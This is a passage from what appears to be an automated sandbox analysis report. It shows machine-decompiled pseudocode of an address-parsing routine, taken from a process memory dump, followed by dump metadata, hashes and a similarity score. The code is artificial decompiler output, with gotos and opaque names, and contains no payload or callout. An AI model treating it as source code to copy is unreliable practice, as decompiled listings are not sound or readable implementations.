                                                                                                                                                  									_v24 = _t164;
                                                                                                                                                  									_v20 = 1;
                                                                                                                                                  									_v16 = 1;
                                                                                                                                                  									L36:
                                                                                                                                                  									if(_v20 == _t127) {
                                                                                                                                                  										goto L19;
                                                                                                                                                  									}
                                                                                                                                                  									_t158 = 0;
                                                                                                                                                  									goto L14;
                                                                                                                                                  								}
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_a7 = 0;
                                                                                                                                                  							_v24 = _t164;
                                                                                                                                                  							_v20 = 1;
                                                                                                                                                  							_v16 = 1;
                                                                                                                                                  							goto L19;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t130 = _t118 - 1;
                                                                                                                                                  					if(_t130 != 0) {
                                                                                                                                                  						if(_t130 == 1) {
                                                                                                                                                  							goto L21;
                                                                                                                                                  						}
                                                                                                                                                  						_t127 = 1;
                                                                                                                                                  						goto L36;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t167 >= 0x80) {
                                                                                                                                                  						L7:
                                                                                                                                                  						if(_t167 == 0x3a) {
                                                                                                                                                  							_t158 = 0;
                                                                                                                                                  							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                  								break;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t119 =  &(_t164[1]);
                                                                                                                                                  								if( *_t119 != _t167) {
                                                                                                                                                  									_v8 = _v8 + 1;
                                                                                                                                                  									L13:
                                                                                                                                                  									_v20 = _t158;
                                                                                                                                                  									goto L14;
                                                                                                                                                  								}
                                                                                                                                                  								if(_v28 != 0) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_v28 = _v8 + 1;
                                                                                                                                                  								_t143 = 2;
                                                                                                                                                  								_v8 = _v8 + _t143;
                                                                                                                                                  								goto L47;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                  							break;
                                                                                                                                                  						} else {
                                                                                                                                                  							_v12 = _v12 + 1;
                                                                                                                                                  							_t158 = 0;
                                                                                                                                                  							goto L13;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					if(E00C8685D(_t167, 4) != 0) {
                                                                                                                                                  						_v16 = _v16 + 1;
                                                                                                                                                  						goto L19;
                                                                                                                                                  					}
                                                                                                                                                  					if(E00C8685D(_t167, 0x80) != 0) {
                                                                                                                                                  						_v16 = _v16 + 1;
                                                                                                                                                  						if(_v12 > 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_a7 = 1;
                                                                                                                                                  						goto L19;
                                                                                                                                                  					}
                                                                                                                                                  					goto L7;
                                                                                                                                                  				}
                                                                                                                                                  				 *_a8 = _t164;
                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                  					if(_v12 != 3) {
                                                                                                                                                  						goto L29;
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = _v8 + 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                  					if(_v20 != 1) {
                                                                                                                                                  						if(_v20 != 2) {
                                                                                                                                                  							goto L29;
                                                                                                                                                  						}
                                                                                                                                                  						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                  						L65:
                                                                                                                                                  						_t105 = _v28;
                                                                                                                                                  						if(_t105 != 0) {
                                                                                                                                                  							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                  							E00C68980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                  							_t110 = 8;
                                                                                                                                                  							E00C5DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                  						}
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v12 != 0) {
                                                                                                                                                  						if(_v16 > 3) {
                                                                                                                                                  							goto L29;
                                                                                                                                                  						}
                                                                                                                                                  						_t114 = E00C8EE02(_v24, 0, 0xa);
                                                                                                                                                  						_t170 = _t170 + 0xc;
                                                                                                                                                  						if(_t114 > 0xff) {
                                                                                                                                                  							goto L29;
                                                                                                                                                  						}
                                                                                                                                                  						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                  						goto L65;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v16 > 4) {
                                                                                                                                                  						goto L29;
                                                                                                                                                  					}
                                                                                                                                                  					_t115 = E00C8EE02(_v24, 0, 0x10);
                                                                                                                                                  					_t170 = _t170 + 0xc;
                                                                                                                                                  					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                  					goto L65;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L29;
                                                                                                                                                  				}
                                                                                                                                                  			}

























                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fassign
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3965848254-0
                                                                                                                                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                  • Instruction ID: c0b15506f3bd10d7c3d76e74021a868cd45a10dce14495575b107c8aebc02e5d
                                                                                                                                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                  • Instruction Fuzzy Hash: 62917F31D0020AEBDF24EFA9C8456EEB7B4FF95308F24807ED411A6162E7705B42DB99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%